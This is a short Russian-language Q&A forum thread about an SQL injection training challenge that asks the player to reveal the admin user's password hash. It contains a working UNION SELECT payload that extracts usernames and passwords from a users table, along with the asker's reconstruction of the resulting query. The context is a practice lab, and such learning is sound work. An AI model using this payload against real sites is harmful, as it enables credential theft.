Live SQL injector training challenges

Question

the chopin Знаток (259), на голосовании 2 месяца назад

6. Nearly blind article injection
Display the 'admin' user's password hash in the article below.

http: //sqli. dennisskinner.com/#/challenge/6
что необходимо вписать в строку поиска?

Answer 1

Александр Искусственный Интеллект (304287) 3 месяца назад

о нет, великий хакер пришёл!...

 1 union select id, username, password from users where username = 'admin'

Увы

Офигеть, заработало, спасибо большое

Позвольте узнать
В сумме, весь код выглядит так или подобно этому

 SELECT * FROM articles WHERE id='1 union select id, username, password from users where username = 'admin'';

Каким образом мы взаимодействуем с командами из под id?